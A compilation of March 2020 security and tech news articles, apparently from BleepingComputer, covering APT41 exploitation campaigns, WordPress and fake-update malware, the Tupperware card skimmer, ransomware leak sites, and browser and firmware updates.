This vulnerability has been exploited in the past to hack into networks and install ransomware.

Phobos Group's Dan Tentler also tweeted that Chubb has a Remote Desktop server publicly accessible from the Internet, which is a huge security risk.

Dan Tentler tweet

According to the FBI, "RDP is still 70-80% of the initial foothold that ransomware actors use."

It is not known if any of these devices were used as part of the attack, but should be secured to enhance perimeter security.

Update 3/26/20: Added information about vulnerable Citrix gateways, RDP servers, and Chubb's statement.


Google Resumes Chrome Releases on an Adjusted Schedule
29
.3.2020  Bleepingcomputer   IT

Google today announced that Chrome and Chrome OS releases will be resumed on an adjusted schedule after previously pausing them due to employees having to work from home during the novel coronavirus pandemic.

The Google Chrome development team is currently working remotely throughout the novel coronavirus outbreak with development efforts being focused on releasing Chrome v81, the next stable release, on April 7.

This schedule page can be checked for accurate release dates for future Google Chrome milestones — dates for M84 and beyond can still be changed at any given time.

The new release schedule is as follows:

M83 will be released three weeks earlier than previously planned and will include all M82 work as we canceled the M82 release (all channels).
Our Canary, Dev and Beta channels have or will resume this week, with M83 moving to Dev, and M81 continuing in Beta.
Our Stable channel will resume release next week with security and critical fixes in M80, followed by the release of M81 the week of April 7, and M83 ~mid-May.
We will share a future update on the timing of the M84 branch and releases.
"We continue to closely monitor that Chrome and Chrome OS are stable, secure, and work reliably," Google's blog post reads.

"We’ll keep everyone informed of any changes on our schedule on this blog and will share additional details on the schedule in the Chromium Developers group, as needed."

Chrome v82 is off the table
Google announced a week ago that they will no longer work on Chrome 82 development because of the new release schedule and will skip to Chrome 83 instead.

This is now confirmed by the Chrome milestones schedule page that only lists the 81, 83, and 84 builds, with build 82 being jumped because of COVID-19 adjustments.

After Chrome releases were paused, Google said that they will prioritize security updates that will be released as Chrome v80 updates.

"We’ll continue to prioritize any updates related to security, which will be included in Chrome 80," Google said.

Google Chrome 80.0.3987.149 was released right after the company announced the Chrome v81 delay, with security fixes for 13 high severity vulnerabilities.


Chinese Hackers Use Cisco, Citrix, Zoho Exploits In Targeted Attacks
29
.3.2020  Bleepingcomputer  BigBrothers

The Chinese state-sponsored group APT41 has been at the helm of a range of attacks that used recent exploits to target security flaws in Citrix, Cisco, and Zoho appliances and devices of entities from a multitude of industry sectors spanning the globe.

It is not known if the campaign that started in January 2020 was designed to take advantage of companies having to focus on setting up everything needed by their remote workers while in COVID-19 lockdown or quarantine but, as FireEye researchers found, the attacks are definitely of a targeted nature.

Broadest Chinese APT campaign in years
As FireEye notes, APT41's recent campaign is one of the most extensive ones Chinese cyber-espionage actors ran in recent years.

"Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers." the report says.

APT41 is a highly prolific Chinese backed hacking group active since at least 2012 and known for espionage, cybercrime, and surveillance operations against a large array of industries, as well as individuals.

This group will usually rely on spear-phishing emails to infiltrate a target's network and then use second-stage malware payloads to compromise the entire environment with the help of dozens of malicious tools while maintaining persistence.

Citrix devices under attack
In their latest campaign, the APT41 hackers were observed while attacking targets from banking and finance, government, high tech, oil & gas to telecom, healthcare, media, and manufacturing.

During this series of seemingly targeted attacks, they focused their attention on entities from a multitude of countries including but not limited to the US, the UK, France, Italy, Japan, Saudi Arabia, and Switzerland.

"It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature," FireEye's researchers added.

Timeline of APT41 attacks
Timeline of APT41 attacks (FireEye)
While exploiting the CVE-2019-19781 vulnerability impacting Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers, APT41 only tried to exploit Citrix devices which hints that the group was using a list of previously identified servers collected during past Internet scans.

During these series of attacks, the APT41 actors were seen fluctuating between periods of high exploitation activity and intermissions.

As FireEye discovered, the hiatus intervals coincide either with Chinese holidays or with quarantine measures taken by the Chinese government in response to the COVID-19 pandemic.

"While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry," the researchers said.

Zoho and Cisco exploitation
On February 21, APT41 compromised a telecommunications organization's Cisco RV320 router but FireEye researchers were unable to determine what exploit was used during this attack after analyzing the incident.

"It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload," FireEye said.

APT41 then moved on to exploiting the CVE-2020-10189 Zoho ManageEngine zero-day no-auth remote code execution vulnerability that allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems.

Starting on March 8, one day after Zoho permanently fixed CVE-2020-10189, the Chinese group attacked over a dozen FireEye customers and managed to compromise the systems of at least five of them.

Christopher Glyer
@cglyer
Replying to @cglyer
The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog...but the TLDR is: exploit --> some combo of bitsadmin, powershell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode pic.twitter.com/3FRTzre53H

16
2:52 PM - Mar 25, 2020
Twitter Ads info and privacy
See Christopher Glyer's other Tweets
The hackers then deployed a trial-version of the Cobalt Strike BEACON loader and dropped another backdoor used for downloading a VMProtected Meterpreter downloader.

This isn't the first time APT41 used publicly available exploits to target internet-facing systems as they have been previously been observed by FireEye while abusing both CVE-2019-11510 in Pulse Secure VPN and CVE-2019-3396 in Atlassian Confluence as recently as October 2019.

"It is notable that we have only seen these exploitation attempts to leverage publicly available malware such as Cobalt Strike and Meterpreter," the report concludes.

"While these backdoors are full-featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.

"This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage."

More details on APT41's activities since the start of 2020 including indicators of compromise (IOCs) and a MITRE ATT&CK technique mapping are available at the end of FireEye's report.


WordPress Malware Distributed via Pirated Coronavirus Plugins
29
.3.2020  Bleepingcomputer  Virus

The threat actors behind the WordPress WP-VCD malware have started to distribute modified versions of Coronavirus plugins that inject a backdoor into a web site.

The WP-VCD family of WordPress infections are distributed as nulled, or pirated, WordPress plugins that contain modified code that injects a backdoor into any themes that are installed on the blog as well as various PHP files.

Once a WordPress site is compromised by WP-VCD, the malware will attempt to compromise other sites on the same shared host and will routinely connect back to its command & control server to receive new instructions to execute.

The ultimate goal of these malicious plugins is to use the compromised WordPress site to display popups or perform redirects that generate revenue for the threat actors.

Example advertisement shown by WP-VCD
Example advertisement shown by WP-VCD
Source: WordFence
Pirated Coronavirus plugins spread WP-VCD
Recently MalwareHunterTeam shared some samples of WordPress plugins with BleepingComputer that were being flagged on VirusTotal as 'Trojan.WordPress.Backdoor.A'.

These WordPress plugins and another one we found were zip files containing what appeared to be legitimate commercial plugins named "COVID-19 Coronavirus - Live Map WordPress Plugin", Coronavirus Spread Prediction Graphs", and "Covid-19".

Readme.txt file for a pirated plugin
Readme.txt file for a pirated plugin
After BleepingComputer analyzed them, we found that all of these plugins contained a 'class.plugin-modules.php' file that contained malicious code and various base64 encoded strings that are commonly associated with WP-VCD plugins.

class.plugin-modules.php file
class.plugin-modules.php file
After the plugin is installed, it will take the base64 encoded PHP code in the WP_CD_CODE variable shown above and save it to the /wp-includes/wp-vcd.php file.

It then prepends code to the /wp-includes/post.php file so that it automatically loads wp-vcd.php every time a page is loaded on the site.

Code to create wp-vcd.php file
Code to create wp-vcd.php file
The plugin will also search for all of the installed themes and adds another base64 encoded PHP code to each of the theme's functions.php file.

Infecting theme's functions.php file
Infecting theme's functions.php file
With these file modifications, the WP-VCD code will now connect back to its C2 server to receive commands to execute on the WordPress host.

These commands will commonly be used to inject code that displays malicious advertisements on the site or perform redirects to other sites.

Protecting your WordPress sites from WP-VCD
As the WP-VCD malware is spread through pirated WordPress plugins, the best way to avoid having your site infected is to not download any plugins from unauthorized sites.

As plugins are easily modified by anyone with a modicum of PHP knowledge, downloading and installing pirated plugins is always a risky venture.

In this environment, we are seeing an even greater uptick in malicious campaigns taking advantage of the anxiety and concerns of the Coronavirus pandemic to distribute malware and phishing attacks.

It is strongly advised that you only install WordPress plugins from authorized sites and do not install any pirated plugins as there is a good chance your site will become compromised.


Google Chrome Adding Option to Always Show Full URLs
29
.3.2020  Bleepingcomputer  IT

Google is working on providing Chrome users with an option to set the browser to always show full URLs for all websites they visit.

At the moment, the option to always show full URLs can only be enabled using an experimental flag on Google Chrome Canary version 83 and it can be accessed via the Omnibox context menu by Mac, Windows, Linux, and Chrome OS users.

As we'll also show below, Google has a long history of working towards hiding the protocol and of what they call trivial subdomains or special-case subdomains from the URLs displayed in Chrome's address bar.

How to reenable full URLs in Chrome Canary
Windows, Mac, Linux, and Chrome OS users who utilize Google's Chrome Canary can configure their browsers to show the full URLs for all websites using the omnibox-context-menu-show-full-urls experimental flag.

The newly added flag is designed to provide Chrome Canary users with an omnibox context menu option that will prevent URL elisions aka the removal of some URL elements Google considers not important.

To do this, you have to go through the following steps:

1. Go to chrome://flags/#omnibox-context-menu-show-full-urls.

2. Click the drop-down menu on the right side of the flag to select 'Enabled'

3. Restart the web browser.

Enabling the Chrome 'show full URLs' option
Enabling the Chrome 'show full URLs' option
Afterward, you will be able to find an 'Always show full URLs' Omnibox context menu option that will tell Chrome to display the entire URL, without eliding any components.

A slimmed-down or early version of this option has already been rolled out to some users of Google Chrome version 80, as BleepingComputer was also able to confirm.

The 'Show URL' option allows them to enable full URLs on a per-page basis — the setting doesn't stick though as it will be forgotten after refreshing the page.

As it is currently being tested Google Chrome Canary version 83.0, the 'Always show full URLs' Omnibox context menu option will most likely roll out once the stable version Google Chrome will be released.

Full URL in address bar
Full URL in the address bar
Out of sight, out of mind
The WWW and M subdomains together with the protocol part (e.g., HTTP, HTTPS, or FTP) of the URL were initially stripped from Chrome's address bar with the release of Chrome 69 in September 2018.

Following users' outcry opposing this change, Google reversed the decision but, once again, hid them from URLs shown in the address bar for users of Chrome 76 on desktop and Android devices.

"The Chrome team values the simplicity, usability, and security of UI surfaces," as product manager Emily Schechter said at the time.

"To make URLs easier to read and understand, and to remove distractions from the registrable domain, we will hide URL components that are irrelevant to most Chrome users," she added. "We plan to hide 'https' scheme and special-case subdomain 'www' in Chrome omnibox on desktop and Android in M76."

Google did leave in an option to have it reversed, as users were still able to enable full URLs in the Omnibox by enabling the temporary-unexpire-flags-m76 flag. However, that lasted until Chrome 79 was released as that flag was permanently removed.

Eric Lawrence 🎻
@ericlaw
TIL (Thanks Emily!) that if you have the Suspicious Site Reporter browser extension enabled, Chrome 76 doesn't hide the "https://www" at the front of the omnibox.

View image on Twitter
16
10:33 PM - Jul 31, 2019
Twitter Ads info and privacy
See Eric Lawrence 🎻's other Tweets
The only way to see the full website address while using Chrome 79 or a newer version is to click twice in the address bar to edit the URL or to install Google's Suspicious Site Reporter Chrome extension.

More recently, Google has also started testing displaying the search query in the Chrome address bar instead of the actual URL of the loaded page when performing searches on Google.

This experimental feature is currently called "Query in Omnibox" and it has been available as a Google Chrome flag since Chrome 71 but it is disabled by default.

"People have a really hard time understanding URLs. They’re hard to read, it’s hard to know which part of them is supposed to be trusted, and in general, I don’t think URLs are working as a good way to convey site identity," Adrienne Porter Felt, Chrome's engineering manager said in a Wired interview,

"So we want to move toward a place where web identity is understandable by everyone—they know who they’re talking to when they’re using a website and they can reason about whether they can trust them."


Windows 10 Insider Build 19592 Brings New 2-in-1 PC Experience
29
.3.2020  Bleepingcomputer  OS

Microsoft has released Windows 10 Insider Preview Build 19592 to Insiders in the Fast ring, which brings back new tablet experience for 2-in-1 convertible PCs.

If you are an Insider on the Fast Ring, you can download the new build now by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19592

The notable changes in this build are listed below.

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

New tablet experience for 2-in-1 convertible PCs
With this build, Microsoft is rolling out a new 2-in-1 convertible PC tablet experience to Windows Insiders.

This experience was previously rolled out to a limited group of Insiders in 20H1 Build 18970 through Build 19013, and after refinements, is being rolled out again so more Insiders can test the following new features:

This new experience allows users entering tablet posture to stay in the familiar desktop experience without interruption with a few key touch improvements:

Taskbar icons are spaced out
Search box on taskbar is collapsed into icon-only mode
Touch keyboard auto invokes when you tap a text field
File explorer elements will have a little more padding, to make them comfortable to interact with using touch
New 2-in-1 tablet experience
New 2-in-1 tablet experience
Source: Microsoft
This feature will roll out to a limited amount of users at first and expand to more users as time goes on. Microsoft will first roll it out to Insiders that have never detached their keyboard before, or have their tablet mode settings set to Don’t ask me and don’t switch.

Changes to the Windows Search platform
With this build, Microsoft has updated the logic in the Windows Search file indexer that finds better times to index your files so that your computer doesn't get bogged down by the indexing process while you are using the computer.

Microsoft has also modified the indexing process to limit the number of times the content is indexed that does not have much impact on your searches.


Malware Disguised as Google Updates Pushed via Hacked News Sites
29
.3.2020  Bleepingcomputer  Virus

Hacked corporate sites and news blogs running using the WordPress CMS are being used by attackers to deliver backdoor malware that allows them to drop several second-stage payloads such as keyloggers, info stealers, and Trojans.

After gaining admin access to the compromised WordPress websites, the hackers inject malicious JavaScript code that will automatically redirect visitors to phishing sites.

These landing pages are designed to look like a legitimate Google Chrome update page and are used by the attackers to instruct potential victims to download an update for their browser.

However, instead of a Chrome update, the targets will download malware installers that will infect their devices and will allow the operators behind this campaign to take control of their computers remotely.

Once executed, the malware installer drops a TeamViewer installation and unarchives two password-protected SFX archives containing the files needed to open the fake update page and to allow remote connections, as well as a script used by the malware to bypass the Windows built-in antivirus.

Fake Chrome update page
Fake Chrome update page (Doctor Web)
Hacking group behind several campaigns
The group behind this attack "was previously involved in spreading a fake installer of the popular VSDC video editor through its official website and the CNET software platform," as Doctor Web researchers revealed in their analysis published today.

They are also behind an attack that used a fake NordVPN website to infect targets with the Bolik banking Trojan behind the scenes, while actually installing the NordVPN client to avoid raising any suspicions.

While previously, they were using the compromised sites to deliver the final payloads, a banking trojan and the KPOT info stealer, this time they switched to a more complex infection involving a backdoor that enables them to drop other malware.

The attackers use the backdoor to deliver X-Key Keylogger, Predator The Thief stealer, and a Trojan that helps them to control the infected computers over the RDP protocol.

Geolocation used to choose targets
"Target selection is based on geolocation and browser detection. The target audience is users from the USA, Canada, Australia, Great Britain, Israel, and Turkey, using the Google Chrome browser," the researchers explain.

"It is worth noting that the downloaded file has a valid digital signature identical to the signature of the fake NordVPN installer distributed by the same criminal group."

The fake Chrome updates come in the form of two different malicious installers named Critical_Update.exe and Update.exe, with the former having been downloaded over 2290 times since it was added to the bitbucket repository used for malware delivery, while the latter has already been pushed over 300 times during the last seven hours onto unsuspecting targets' machines.

More information on the infection mechanism used during this attack is available within Doctor Web's report, while indicators of compromised (IOCs) can be found on GitHub.

WordPress sites under attack
Since the start of the year, attackers have been actively trying to take control of WordPress websites by exploiting recently patched or zero-day vulnerabilities in plugins with hundreds of thousands of sites being sieged.

BleepingComputer reported during late February about attempts to take over tens of thousands of WordPress sites by abusing critical bugs including a zero-day in multiple plugins that could lead rogue admin​​​ accounts being created and backdoors being planted.

Attackers have also tried to fully compromise or wipe WordPress sites by exploiting unpatched versions of plugins with an estimated number of 1,250,000 active installations, as well as WordPress plugin flaws including the multiple bugs found in the WordPress GDPR Cookie Consent plugin used by over 700,000 websites.

Additionally, a high severity cross-site request forgery (CSRF) bug was discovered in the Code Snippets plugin with over 200,000 installs and two vulnerabilities found in the open-source WP Database Reset WordPress plugin used by over 80,000 sites could allow for site takeovers and database resets.


Microsoft Fixes Windows Defender Scan Bug With New Update
29
.3.2020  Bleepingcomputer  OS

Microsoft has silently fixed the "items skipped during scan" Windows Defender bug that was causing some items to be excluded from scans if they were stored on a network device.

The issue was fixed with the release of the KB4052623 update for the Windows Defender antimalware platform that will increment the scan engine's version to 4.18.2003.8 and will prevent future notifications of files being skipped from appearing.

KB4052623 can be installed by Windows 10 customers with devices running Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, and Windows Server 2016.

KB4052623

The bug fixed with this update was reported by scores of Windows 10 users starting with the March Patch Tuesday after they started receiving "Items skipped during scan" alerts saying that "The Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings."

This happened even when users didn't have any exclusion's configured within their systems' Windows Defender preferences as BleepingComputer was able to confirm.

One day later, BornCity's Günter Born discovered a simple workaround to get rid of these notifications by enabling network scanning although Microsoft documentation recommends against scanning network files.

The bug was caused by a Windows Defender scanner engine update that automatically disabled network scanning for newer versions, after previously having them enabled before the updates released during this month's Patch Tuesday.

Windows Defender alert caused by this bug
Windows Defender alert caused by this bug
Microsoft's decision to turn off network scanning in Windows Defender might have been prompted by a high network traffic issue as detailed in KB4052623's description.

"Enterprises that use Network Protection in either Audit or Block mode may experience greater than expected network traffic departing their networks to Microsoft Defender SmartScreen-associated domains," the knowledgebase article says.

"This affects customers who are running version 4.18.2001.10. We are working on a service update to address this issue. In the interim, you can work around this issue by temporarily disabling Network Protection."

All users should get the KB4052623 update automatically through Windows Update during the next few days, even if they have them paused.

You can also download and install the update on your own from the Microsoft Update Catalog if you're not keen on waiting for Microsoft to roll it out to your device.


Tupperware Site Hacked With Fake Form to Steal Credit Cards
29
.3.2020  Bleepingcomputer  CyberCrime

Hackers have compromised the website of the world-famous Tupperware brand and are stealing customers' payment card details at checkout. The risk existed for a while as researcher’s attempts to alert the company remained unanswered.

Some localized versions of the official Tupperware website were also running malicious code that skims credit card data.

The attack was carefully orchestrated to keep the skimmer active for as long as possible - a clear indication that this is not the work of run-of-the-mill MageCart attackers.

Clever tactic
The hackers used an ingenious method to steal credit card data from Tupperware customers at checkout: they integrated a malicious iframe that displays a fake payment form fields to shoppers.

Discovered by researchers at Malwarebytes, the iframe loaded the content from “deskofhelp[.]com,” a domain that was created on March 9 and it is hosted on a server with multiple phishing domains.


Tupperware fixed the issue and the payment form is currently loading from the legitimate domain cybersource.com, owned by Visa. However, code from the attackers is still available.

The researchers looked closer at the domain hosting the malicious content and noticed that it was registered with a Yandex email address, something that is downright suspicious when it comes to loading payment forms on a US-branded website.

The fraudsters made an effort to conceal the compromise by loading the iframe dynamically on the checkout page. Thus, looking at the HTML‌ source code shows nothing dubious.

However, checking the iframe source revealed the malicious domain hosting the iframe content.


Multiple localized Tuppperware sites were compromised in the same way and one mistake the attackers made was that they used the same payment form on all of them.

As such, the Spanish version of Tupperware site loaded the attacker’s payment form in English, Jérôme Segura from Malwarebytes writes in a report today, while the legitimate form is localized.

To keep shoppers unaware of the credit card skimming, they would see an error immediately after entering the sensitive data.‌‌ Next, the page would be reloaded with the legitimate form and they could complete the purchase.

“Upon close inspection, we see the fraudsters even copied the session time-out message from CyberSource, the payment platform used by Tupperware. The legitimate payment form from CyberSource includes a security feature where, if a user is inactive after a certain amount of time, the payment form is cancelled and a session time-out message appears” - Jérôme Segura, Malwarebytes

Tupperware customer data collected by cybercriminals this way includes first and last name, billing address, phone number, credit card number, credit card expiry date, and the CVV (card verification value, required for online shopping).

How the rogue iframe came to load on Tupperware website is also interesting. Segura found a snippet of code on the homepage that was dynamically calling a FAQ icon from Tupperware server.

The icon loaded silently and invisibly to shoppers and contained malicious JavaScript responsible for loading the attackers’ iframe on the checkout page.


It is unclear for how long the malicious activity survived on Tupperware website but the March 9 registration date of domain hosting the fake payment form is an indication; especially since the rogue code was not present in February.

Incomplete cleanup
As for how the compromise happened, Segura found a possible answer by using Sucuri’s SiteCheck service, which shows that the website is running an outdated version of Magento e-commerce software.

Tupperware did not respond to Malwarebytes's attempts to disclose the breach responsibly but did take action to remove the risk to customers.

The PNG file with code that loaded the iframe is no longer available on the website but the script that called it in the first place is still present, Segura told BleepingComputer.


The researcher says that shutting hackers out of a website requires deep inspection to determine how the compromised happened in the first place and to make sure that there are no vulnerabilities that could lead to a new breach.

"Like any website compromise, it is important to look for the root cause by inspecting server side logs and determine if the attackers still have access. Often times, criminals will leave PHP backdoors or can simply re-exploit the same vulnerability to get back in" - Jérôme Segura, Malwarebytes

Update March 25, 11:22 EDT: A tweet from Malwarebytes informs that Tupperware removed the rest of the client-side malicious artifacts. Hopefully, the company did a thorough investigation to close any gaps that hackers might use for a future attack.


Mozilla Firefox Gets a HTTPS Only Mode For More Secure Browsing
29
.3.2020  Bleepingcomputer  Security

Mozilla Firefox 76 is getting a new 'HTTPS Only' mode that automatically upgrades all HTTP requests to HTTPS when browsing the web and blocks all connections that can't be upgraded.

When connecting to an HTTP site, your connection is not encrypted and your ISP and programs running on the computer can monitor the data being sent over it. This includes your passwords, credit card info, and other sensitive information.

Due to this, it is always recommended that you only use HTTPS sites, which encrypt the connection between the browser and the web site.

While most web sites are now using HTTPS, some continue to only use the HTTP protocol and Mozilla is adding a new feature that will automatically upgrade your connection to HTTPS or block you from visiting the site.

Mozilla's 'HTTPS Only' mode
Similar to the HTTPS Everywhere addon, when Firefox's HTTPS Only feature is enabled the browser will automatically change any HTTP requests to HTTPS and if unable to connect will display an alert asking if you wish to continue connecting via HTTP.

Being developed for Firefox 76, this feature will not be enabled by default and will also attempt to upgrade subresources like CSS files, scripts, and images to HTTPS and if unable to do so, quietly block them from loading.

Currently, if a Firefox user types foo.com in the address bar then our internal machinery establishes an HTTP connection to foo.com. Within this project we will expose a preference which allows end users to opt into an 'HTTPS Only' mode which tries to establish an HTTPS connection rather than an HTTP connection for foo.com. Further, we will upgrade all subresources within the page to load using https instead of http.

Implementation considerations:

For top-level loads which encounter a time-out we could provide some kind of error page with a button which would allow the end user to load the requested page using http.
For subsource loads we could fail silently and just log some info to the console.
This feature is currently available in the Firefox 76 Nightly builds and can be enabled by toggling the 'dom.security.https_only_mode' setting to 'True' in about:config.

dom.security.https_only_mode flag
dom.security.https_only_mode flag
Once enabled, if you go to an HTTP site, Firefox will automatically change it to an HTTPS connection. If unable to connect via HTTPS, it will display an alert as shown below.

Warning about an HTTP connection
Warning about an HTTP connection
This alert warns that continuing to the HTTP site is a "Potential Security Risk" and recommends that you do not continue. If you choose to continue, the 'HTTPS Only' mode will be disabled for the site.

Warning: Potential Security Risk Ahead

Nightly detected a potential security threat and did not continue to neverssl.com. If you visit this site, attackers could try to steal information like your passwords, emails, or credit card details.

What can you do about it?

The issue is most likely with the website, and there is nothing you can do to resolve it. You can notify the website’s administrator about the problem.
This is an interesting feature and one that many would enable by default as it only increases the security of the websites you visit with the minor inconvenience of an alert here and there as you browse to insecure web sites.


Three More Ransomware Families Create Sites to Leak Stolen Data
29
.3.2020  Bleepingcomputer  Ransomware

Three more ransomware families have created sites that are being used to leak the stolen data of non-paying victims and further illustrates why all ransomware attacks must be considered data breaches.

Ever since Maze created their "news" site to publish stolen data of their victims who choose not to pay, other ransomware actors such as Sodinokibi/REvil, Nemty, and DoppelPaymer have been swift to follow.

Over the past two days, BleepingComputer has learned of another three ransomware families who have now launched their data leak sites, which are listed below.

While we have been saying it for a long time, with the continued release of data leak sites, ransomware attacks must be treated as data breaches now that the personal and private data of employees is being published online.

To make matters worse, other threat actors are taking the data exposed in these leaks and selling it on hacker forums so it can be utilized in other attacks.

Nefilim Ransomware
The Nefilim Ransomware has launched a site called "Corporate Leaks" that is being used to dump the data of victims who do not pay a ransom.

Nefilim is fairly new and is believed to be a new version of the Nemty Ransomware.

Nefilim Ransomware Leak Site
Nefilim Ransomware Leak Site
This leak site currently lists two companies who both are involved with energy or resources.

CLOP Ransomware
The CLOP Ransomware has also released a leak site called "CL0P^_- LEAKS" that they are using to publish stolen data for non-paying victims.

The CLOP Ransomware made news recently after it attacked the Maastricht University and was paid 30 bitcoins to recover their data.

CLOP Leaks Site
CLOP Leak Site
The site currently lists four different companies whose data has been released.

Sekhmet Ransomware
Finally, a relatively new ransomware called Sekhmet has also released a data leak site called "Leaks leaks and leaks".

Not much is known about this ransomware other than that their ransom note is named "RECOVER-FILES.txt".

Sekhmet Leak Site
Sekhmet Leak Site
Their leak site only lists one company at this time.


HPE Warns of New Bug That Kills SSD Drives After 40,000 Hours
29
.3.2020  Bleepingcomputer  Vulnerebility

Hewlett Packard Enterprise (HPE) is once again warning its customers that certain Serial-Attached SCSI solid-state drives will fail after 40,000 hours of operation, unless a critical patch is applied.

The company made a similar announcement in November 2019, when firmware defect produced failure after 32,768 hours of running.

Affected drives
The current issue affects drives in HPE server and Storage products like HPE ProLiant, Synergy, Apollo 4200, Synergy Storage Modules, D3000 Storage Enclosure, StoreEasy 1000 Storage.

HPE Model Number HPE SKU HPE SKU DESCRIPTION HPE Spare Part SKU HPE Firmware Fix Date
EK0800JVYPN 846430-B21 HPE 800GB 12G SAS WI-1 SFF SC SSD 846622-001 3/20/2020
EO1600JVYPP 846432-B21 HPE 1.6TB 12G SAS WI-1 SFF SC SSD 846623-001 3/20/2020
MK0800JVYPQ 846432-B21 HPE 800GB 12G SAS MU-1 SFF SC SSD 846624-001 3/20/2020
MO1600JVYPR 846436-B21 HPE 1.6TB 12G SAS MU-1 SFF SC SSD 846625-001 3/20/2020
The company says that this is a comprehensive list of impacted SSDs it makes available. However, the issue is not unique to HPE and may be present in drives from other manufacturers.

If the SSD in the HPE products runs a firmware version older than HPD7, they will fail after being powered on for 40,000 hours; this translates into 4 years, 206 days, 16 hours and it is about half a year shorter than the extended warranty available for some of them.

When the failure point is reached, neither the data nor the drive can be recovered. Preventing such a disaster is possible in environments with data backup setups.

HPE learned about the firmware bug from a SSD manufacturer and warns that if SSDs were installed and put into service at the same time they are likely to fail almost concurrently.

“Restoration of data from backup will be required in non-fault tolerance modes (e.g., RAID 0) and in fault tolerance RAID mode if more drives fail than what is supported by the fault tolerance RAID mode logical drive [e.g. RAID 5 logical drive with two failed SSDs]” - HPE advisory

The new firmware can be installed by using the online flash component for VMware ESXi, Windows, and Linux.

Last month, Dell EMC released new firmware to correct a bug causing nine SanDisk SSDs in its portfolio to fail "after approximately 40,000 hours of usage." Dell identified the following models to be impacted:

LT0200MO
LT0400MO
LT0800MO
LT1600MO
LT0200WM
LT0400WM
LT0800WM
LT0800RO
LT1600RO
The update corrects a check for logging the circular buffer index value. "Assert had a bad check to validate the value of circular buffer's index value. Instead of checking the max value as N, it checked for N-1," Dell's advisory explains.

Customers that were shipped one or more of the affected SSD models were informed about this "potentially critical issue" with the recommendation to apply the update immediately.

source: Ravigon
Not as bad as last time
There is some good news, though. By checking the shipping dates from HPE and considering the 40,000 hours expiration limit, no affected SSD have failed because of this firmware bug.

HPE estimates that unpatched SSDs will begin to fail as early as October 2020. This gives plenty of time for admins to apply the corrected firmware.

Back in November, reports about storage drive failure came pouring on social media and forums, with ussers complaing about device collapsing in bulk, minutes apart.

Finding out the uptime of an affected drive is possible with the Smart Storage Administrator (SSA) utility, which offers the power-on time for every drive installed on the system.

Alternatively, users can run scripts that can check if the firmware on their SSDs has the 40,000 power-on-hours failure issue. The scripts work for certain HPE‌‌ SAS SSDs and are available for Linux, VMware and Windows.

Update March 25, 09:05 EDT: Article updated with details about some SandDisk SSDs that could also fail after 40,000 hours of operation time.

h/t JohnC_21 (comment below)


Tor Browser 9.0.7 Patches Bug That Could Deanonymize Users
29
.3.2020  Bleepingcomputer  Vulnerebility

The Tor Project released Tor Browser 9.0.7 today with a permanent fix for a bug that allowed JavaScript code to run on the Safest security level in some situations while using the previous Tor Browser version.

Since Tor Browser users are relying on its security features to anonymously browse the Internet, having their identity exposed by a JavaScript that could be used for fingerprinting or unveiling their true location defeated the browser's private browsing promise without tracking, surveillance, or censorship.

After updating to the latest version, all JavaScript code is again disabled automatically on non-HTTPS sites while browsing the web with the Tor Browser on the Safest security level.

Tor Browser's Safest security level
Tor Browser's Safest security level
"If you browse on Tor Browser's "Safest" security level: This release disables Javascript," the Tor Project team tweeted. "This may change your workflow if you previously allowed Javascript on some sites using NoScript."

"We're taking this precaution until we're confident recent NoScript versions successfully block Javascript execution, by default, by working around a Firefox ESR vulnerability."

While users were recommended to follow toggle off the javascript.enabled flag within the browser's about:config dialog when Tor Browser 9.0.6 was released, the NoScript 11.0.17 update that automatically applied to all users was supposed to have fixed the bug.

But user reports later said that the extension update didn't fully mitigate the issue which, again, could have led to some users' info being accidentally leaked and potentially deanonymizing them.

The Tor Project

@torproject
🔔 Time to update: There's a new version of Tor Browser out now.

Tor Browser 9.0.7 updates Tor to 0.4.2.7 and NoScript to 11.0.19.

If you browse on Tor Browser's "Safest" security level: This release disables Javascript.*https://blog.torproject.org/new-release-tor-browser-907 …

131
4:09 PM - Mar 24, 2020
Twitter Ads info and privacy
81 people are talking about this
The release of Tor Browser 9.0.7, however, now disables Javascript for the entire browser when the Safest security level is selected as it should.

While on the Safest security level, users can restore the previous behavior and allow JavaScript by following this procedure:

1. Open about:config
2. Search for: javascript.enabled
3. The "Value" column should show "false"
4. Either: right-click and select "Toggle" such that it is now disabled or double-click on the row and it will be disabled.

"We are taking this precaution until we are confident recent NoScript versions successfully block Javascript execution, by default, by working around a Firefox ESR vulnerability," the Tor team explains.

This is not the first bug that could have been used to unmask Tor Browser users, with information exposure vulnerabilities being patched in the past by the Tor Project team to block attackers from bypassing the browser's anonymity features and discover the client's IP address, their language, or their UI locale.


TeamViewer Stops Commercial Use Checks in Coronavirus-Affected Regions
29
.3.2020  Bleepingcomputer  IT

TeamViewer has stated that they will stop performing checks for commercial use of their remote control product in regions heavily affected by the Coronavirus.

TeamViewer is a remote control software that is commercial organizations can purchase to offer remote support and for non-commercial, or personal, users to use for free to control their computer or help friends and family.

Even personal use of TeamViewer is meant to be for free, some users are erroneously detected as being used for commercial use.

When this happens, their sessions will be disconnected and they are prompted to purchase the program with various alerts, some comical, as shown below. TeamViewer Commercial use detected alerts
TeamViewer Commercial use detected alerts
With more people working from home, friends and family helping each other with technical issues, or some using it for commercial reasons without a license, many TeamViewer users have started to receive the dreaded "Commercial use detected" alerts.

